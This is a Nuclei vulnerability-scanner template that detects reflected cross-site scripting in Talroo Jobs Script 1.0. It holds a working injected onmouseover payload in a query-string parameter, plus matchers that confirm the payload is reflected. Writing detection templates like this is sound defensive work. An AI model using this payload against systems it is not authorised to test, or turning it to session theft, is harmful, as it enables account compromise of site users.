id: talroo-jobs-xss

info:
  name: Talroo Jobs Script 1.0 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://packetstormsecurity.com/files/173043/Talroo-Jobs-Script-1.0-Cross-Site-Scripting.html
    - https://www.exploitalert.com/view-details.html?id=39619
    - https://www.netartmedia.net/talroo-jobs
  metadata:
    verified: true
    max-request: 1
  tags: packetstorm,xss,unauth,talroo

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=jobs&category=1&lrw3e%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22k1n44=1"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Talroo Jobs") && contains(body, "confirm(document.domain)")'
          - 'contains(content_type, "text/html")'
        condition: and

# digest: 4b0a00483046022100bd98fd79614343f0e5a039aaa3ce958f6707ae226d0bc28fc90a65e3933d362e022100fa443cd6e93720322cd49a2724494bd30cf3b50826cd132d76c5c4e17d67312a:922c64590222798bb761d5b6d8e72950
